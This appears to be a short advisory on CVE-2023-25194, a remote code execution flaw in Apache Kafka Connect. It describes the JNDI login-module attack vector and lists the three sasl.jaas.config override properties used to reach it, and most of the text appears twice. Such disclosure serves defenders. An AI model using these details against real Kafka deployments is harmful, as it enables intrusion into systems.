This critical vulnerability is tracked as CVE-2023-25194 and was reported on February 8.
The vulnerability has the potential to enable a remote attacker with authentication to run any code on the system. This is due to unsafe deserialization that occurs during the configuration of the connector through the Kafka Connect REST API.
The vulnerability can only be triggered when there is access to a Kafka Connect worker – a logical work unit component – and the user must also be able to create or modify worker connectors with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol. It involves Lightweight Directory Access Protocol (LDAP) and Java Naming and Directory Interface (JNDI) endpoints.
An authenticated attacker can configure the sasl.jaas.config property for any of the connector’s Kafka clients to “com.sun.security.auth.module.JndiLoginModule“. It is possible via the following properties:
Sources:
https://portswigger.net/daily-swig/remote-code-execution-flaw-patched-in-apache-kafka
https://www.news.de/technik/8567359...-versionen-und-updates-fuer-cve-2023-25194/1/
https://socradar.io/patch-released-for-cve-2023-25194-rce-vulnerability-in-apache-kafka/
https://hackerone.com/reports/1529790
The vulnerability has the potential to enable a remote attacker with authentication to run any code on the system. This is due to unsafe deserialization that occurs during the configuration of the connector through the Kafka Connect REST API.
The vulnerability can only be triggered when there is access to a Kafka Connect worker – a logical work unit component – and the user must also be able to create or modify worker connectors with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol. It involves Lightweight Directory Access Protocol (LDAP) and Java Naming and Directory Interface (JNDI) endpoints.
An authenticated attacker can configure the sasl.jaas.config property for any of the connector’s Kafka clients to “com.sun.security.auth.module.JndiLoginModule“. It is possible via the following properties:
- producer.override.sasl.jaas.config
- consumer.override.sasl.jaas.config
- admin.override.sasl.jaas.config
Sources:
https://portswigger.net/daily-swig/remote-code-execution-flaw-patched-in-apache-kafka
https://www.news.de/technik/8567359...-versionen-und-updates-fuer-cve-2023-25194/1/
https://socradar.io/patch-released-for-cve-2023-25194-rce-vulnerability-in-apache-kafka/
https://hackerone.com/reports/1529790